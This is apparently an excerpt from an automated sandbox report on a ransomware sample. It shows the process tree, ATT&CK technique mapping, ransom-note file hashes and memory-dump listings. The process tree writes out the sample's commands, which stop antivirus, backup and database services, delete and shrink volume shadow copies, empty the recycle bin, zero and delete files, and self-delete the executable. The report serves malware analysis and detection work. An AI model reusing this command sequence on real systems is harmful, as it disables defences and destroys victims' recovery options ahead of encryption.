- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:2128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:5308
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:3360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:6124
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:5316
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:3652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5560
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:5000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:4892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:6024
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:5488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5948
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:2740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5816
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:3736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5896
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:4440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:5888
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:4148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:5852
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5092
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:4708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:5512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:4040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:5504
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:6100
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:4332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:5772
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:1252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:1608
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:3744
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:1152
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4880
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:4704
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2628
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:2840
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2100
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5024
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4716
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5076
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4112
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:2932
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2484
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:1376
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4740
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2072
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:2664
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:3576
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:1056
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:96
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:5104
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:3924
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:4240
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:2980
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:4832
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:2460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2464
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:1284
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:4336
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:4572
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:2892
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:324
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3920
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3476
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:2868
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:3996
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:1436
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:4888
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:4232
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  PID:2008
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:4356
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1436
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:5944
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:6140
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
  2⤵
  PID:5752
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:5208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:5324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:5396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:5760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:5744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:5496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:5480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:5932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:5840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:5832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:5824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:5808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:5964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:6084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:6076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:6068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:6016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5956

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\HOW_TO_DECYPHER_FILES.txt

Filesize
446B

MD5
064ac5a098be48e453ec99596120477d

SHA1
a2dcd4bb327d9024bc8b1cfc810418d6b5fd2cdd

SHA256
837165782b93bb67affcfb8b29cf0da09430a83d445f38903ebc67efc83dda33

SHA512
ca86182f3b4b1958e29cd1ea3f1c821e48af09e0f9ca8a1dcab387ed683dcbe9d7ece9e94582252a38b55cdd82520f3318518e5504802dda882f477fc9e8a819

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ee40729e6ec6eacff74cd1eef6ba50a9

SHA1
60e055a312d5e57b75cb075550c364f8d1f2e2b4

SHA256
761f824821d6650bd605a84955538ed588a324b97ad3efc8afc9308aadd3cb87

SHA512
152021f29d6f76f51ed44b9fd82d52d7e99f956d326b5d5a45b888f1da8d84431a93d9d43d1ea746c45bcab23dcab7ddb7ea086e40ae1208c1113b55ffed39d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
59904e2951b97136725ee0fdf0a67514

SHA1
3ea91c5a1470200f6acbfda0c572ace43da25e5f

SHA256
062a29f1c84ceb835227993dc739f5b1d382fe40d23a627b97f8c41a3f164559

SHA512
0b372297c949debf6130f7e34056259c2c24702394f2d51c590b84c850779d1093a1cf901921eed1152cb3895fec9c3180a038003d5e3872530fa90f744c3022

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
67723e380cb938dd9db0359260238eb0

SHA1
45d3df7f9a007c3ecd3ff3793798cedfeac5cc3d

SHA256
e9ddb3d1d742270dbea7e07874ee56acbc2c6a47e49a64c0bb33c96398b40635

SHA512
c941178648e0ea4d0d96982e8a45710244c69615e014166f8af355e1095186798f5d7f72de1c57e3032f154b98485330bca28582a5bd978818ea7b25fcd7788a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4602a39ab52df90f91150944b46d4e3c

SHA1
ebc0ce39ad331d296098c728b218db870bf82b34

SHA256
eeb9332785371bca7abb7f61263213dc592252cb2b2d40b8cf03f97e5897ae1b

SHA512
5961c2cee3b7636e22265796178175db1c8b4d2734134f96592cb700c46ae469de272311304bbfc9bc64cd1e9eeaf95b5fa70c8c196b05c264c0c1fd2af1dcdb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
03013eeb89cb506e01c421ae653e2124

SHA1
0928d004ad325ec912691b4445beb2bdcb9a8ec9

SHA256
70f70d03da1439724e347673bdd3225af1784605de4b696718fdbc02a9d275f5

SHA512
ceae70e966316faf8591aac4fac4f73acd98f8fa0673f5dd4dfabc7366ecfb38ada214aacb15758bfb5ddc71c76efbe4577e499d11dc5fa168c9f82e6c1975ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5ac7d8c6e706dce2e3d0ecc1a49c9929

SHA1
1f4351b1c5f4104af921802dac7f74525a08e140

SHA256
fa19a85ec09554a2ca372374699c8063fdef615e9d8603770351f36ba8632a1b

SHA512
21d0846efa7d46bec707567fa99570957e0c8949be3f87d868cd9d00dd39e6e94e9e6b0c5c90aa706ddb9ed3ca9c7e4f6d7e3b4c434ecf85e35a22ab03c4de03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f657d05caebf1181898d036c84fff00c

SHA1
336480aa0ba39a6d15dd74fd576951f1ad7d34b0

SHA256
23215bf77feab6be960a7cd35ab953625e8af29a1e17b4a85f1e6b2ea5a93d65

SHA512
d8f891cf81c39bb5f121f501196dcd88c4b351f91e8c48c258604d910de5960fc96ddf071acb47fb78973f0546ce89806f8506782ce4b4c43aef33fa2371a9b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
434e182101659eb7df450fd7260f300c

SHA1
fe0d21890d315885e824883853ec5007920f251b

SHA256
82440f6e14400cacb6ec41bcb62e927aaffecc194fd6debcc8abc1d7d5a3a691

SHA512
d2a26a3508a6b87126614e60175fa476fbc8dadf3dce80c5a832b848c9e688f8d9be42419ce582ffdfa3811fd59bf109de82dcf2eb72c9e68d7d08ee3a43056b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
434e182101659eb7df450fd7260f300c

SHA1
fe0d21890d315885e824883853ec5007920f251b

SHA256
82440f6e14400cacb6ec41bcb62e927aaffecc194fd6debcc8abc1d7d5a3a691

SHA512
d2a26a3508a6b87126614e60175fa476fbc8dadf3dce80c5a832b848c9e688f8d9be42419ce582ffdfa3811fd59bf109de82dcf2eb72c9e68d7d08ee3a43056b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e7ab3b505448c156d2322c79d41b0490

SHA1
0c6a24ccfcd61c64f8ea354160c3b8b3fb7161c4

SHA256
ba6465e480eb0c5bd0768e210ead4887b71ea51b1a58b96efcff8ad10c785dc2

SHA512
e72564af4c2f13b5879008c3ee8e469d7391138c34cc29bbdc65343e0a8319695c79d55bf3bb4e05155f09b13c977accff46ec6f2cdf9709bdee03fa56916d39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d191a49b524efa2afee02941024c9db8

SHA1
b382bbd9f65d136053b2a553dae11644205a1b0d

SHA256
91c568e929948a58ffbceebe3920a78e30cc272f8f74c4c417b2640550ee803f

SHA512
c4d15c09fa60dc5115cbca4fd74f062d779edbc4bad5a0fce5f2f5378bbc1873db73394aeef6f9fd72cb185ca4bb117034acb50d752141653beb50b5fa2ea859

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf9ab34c21bbec95ddbcd915119a0bf5

SHA1
7dd527ef91eb40ef6dcbd687d4b3c8cb1d443d9c

SHA256
4ecccdb05ad90792c3a3e2c74ae1364e8a5eb05b2ecb779660a2142fcdf2375d

SHA512
b46910bffea33e8346003d477c168e5d67f7147a76d64feb112d2242c6edf221508d80f8fdc8b79728e09eab0618369a5d9680c4b153abe85ad60cbcafe9cb92

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pakh5p23.prc.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

Filesize
1KB

MD5
b548dfbbe5aae004817a168daab2f2b0

SHA1
b74118f885b542a7119d2e4707ea67faec88efb5

SHA256
9e0010966d4f3c6084aefb553a4d011a21a99ec444da8e365f11a24056c7c92c

SHA512
51ce290ecb03db93731697f891594427abc9059d120a2686c951f5588760edbd96176e8e27d05ee10fc841daa3c47bea1fb5f4ee217dff1875f6502877c636e6

Download Submit
memory/316-402-0x000001F376B50000-0x000001F376B60000-memory.dmp

Filesize
64KB

Download
memory/316-106-0x000001F376B50000-0x000001F376B60000-memory.dmp

Filesize
64KB

Download
memory/316-105-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/316-367-0x000001F376B50000-0x000001F376B60000-memory.dmp

Filesize
64KB

Download
memory/316-98-0x000001F376B50000-0x000001F376B60000-memory.dmp

Filesize
64KB

Download
memory/436-102-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/436-371-0x0000023023930000-0x0000023023940000-memory.dmp

Filesize
64KB

Download
memory/436-92-0x0000023023930000-0x0000023023940000-memory.dmp

Filesize
64KB

Download
memory/436-103-0x0000023023930000-0x0000023023940000-memory.dmp

Filesize
64KB

Download
memory/436-412-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/2200-104-0x000001ECF0C50000-0x000001ECF0C60000-memory.dmp

Filesize
64KB

Download
memory/2200-360-0x000001ECF0C50000-0x000001ECF0C60000-memory.dmp

Filesize
64KB

Download
memory/2200-385-0x000001ECF0C50000-0x000001ECF0C60000-memory.dmp

Filesize
64KB

Download
memory/2200-347-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/2200-414-0x000001ECF0C50000-0x000001ECF0C60000-memory.dmp

Filesize
64KB

Download
memory/2200-87-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/2512-297-0x00000207CE040000-0x00000207CE050000-memory.dmp

Filesize
64KB

Download
memory/2512-364-0x00000207CE040000-0x00000207CE050000-memory.dmp

Filesize
64KB

Download
memory/2512-296-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/2688-409-0x00000280AB3A0000-0x00000280AB3B0000-memory.dmp

Filesize
64KB

Download
memory/2688-72-0x00000280AB3A0000-0x00000280AB3B0000-memory.dmp

Filesize
64KB

Download
memory/2688-55-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/2688-374-0x00000280AB3A0000-0x00000280AB3B0000-memory.dmp

Filesize
64KB

Download
memory/2688-174-0x00000280AB3A0000-0x00000280AB3B0000-memory.dmp

Filesize
64KB

Download
memory/2688-101-0x00000280AB3A0000-0x00000280AB3B0000-memory.dmp

Filesize
64KB

Download
memory/2688-310-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/2832-182-0x000001C1660B0000-0x000001C1660C0000-memory.dmp

Filesize
64KB

Download
memory/2832-82-0x000001C1660B0000-0x000001C1660C0000-memory.dmp

Filesize
64KB

Download
memory/2832-321-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/2832-61-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/2832-332-0x000001C1660B0000-0x000001C1660C0000-memory.dmp

Filesize
64KB

Download
memory/2832-78-0x000001C1660B0000-0x000001C1660C0000-memory.dmp

Filesize
64KB

Download
memory/2832-338-0x000001C1660B0000-0x000001C1660C0000-memory.dmp

Filesize
64KB

Download
memory/2852-400-0x000001D729580000-0x000001D729590000-memory.dmp

Filesize
64KB

Download
memory/2852-96-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/2852-405-0x000001D729580000-0x000001D729590000-memory.dmp

Filesize
64KB

Download
memory/2852-396-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/2852-382-0x000001D729580000-0x000001D729590000-memory.dmp

Filesize
64KB

Download
memory/2852-99-0x000001D729580000-0x000001D729590000-memory.dmp

Filesize
64KB

Download
memory/2852-97-0x000001D729580000-0x000001D729590000-memory.dmp

Filesize
64KB

Download
memory/3936-69-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/3936-377-0x0000011B46010000-0x0000011B46020000-memory.dmp

Filesize
64KB

Download
memory/3936-80-0x0000011B46010000-0x0000011B46020000-memory.dmp

Filesize
64KB

Download
memory/3936-76-0x0000011B46010000-0x0000011B46020000-memory.dmp

Filesize
64KB

Download
memory/3936-327-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/3936-335-0x0000011B46010000-0x0000011B46020000-memory.dmp

Filesize
64KB

Download
memory/3936-176-0x0000011B46010000-0x0000011B46020000-memory.dmp

Filesize
64KB

Download
memory/4404-50-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/4404-8-0x000001ED3D530000-0x000001ED3D540000-memory.dmp

Filesize
64KB

Download
memory/4404-6-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/4404-9-0x000001ED3D530000-0x000001ED3D540000-memory.dmp

Filesize
64KB

Download
memory/4404-10-0x000001ED3D450000-0x000001ED3D472000-memory.dmp

Filesize
136KB

Download
memory/4404-13-0x000001ED3D740000-0x000001ED3D7B6000-memory.dmp

Filesize
472KB

Download
memory/4404-26-0x000001ED3D530000-0x000001ED3D540000-memory.dmp

Filesize
64KB

Download
memory/4916-169-0x000000001B230000-0x000000001B240000-memory.dmp

Filesize
64KB

Download
memory/4916-100-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/4916-0-0x0000000000620000-0x000000000063A000-memory.dmp

Filesize
104KB

Download
memory/4916-2-0x000000001B230000-0x000000001B240000-memory.dmp

Filesize
64KB

Download
memory/4916-1-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/5092-357-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download
memory/5092-389-0x000002777D900000-0x000002777D910000-memory.dmp

Filesize
64KB

Download
memory/5092-194-0x000002777D900000-0x000002777D910000-memory.dmp

Filesize
64KB

Download
memory/5092-95-0x000002777D900000-0x000002777D910000-memory.dmp

Filesize
64KB

Download
memory/5092-91-0x00007FFC94F40000-0x00007FFC9592C000-memory.dmp

Filesize
9.9MB

Download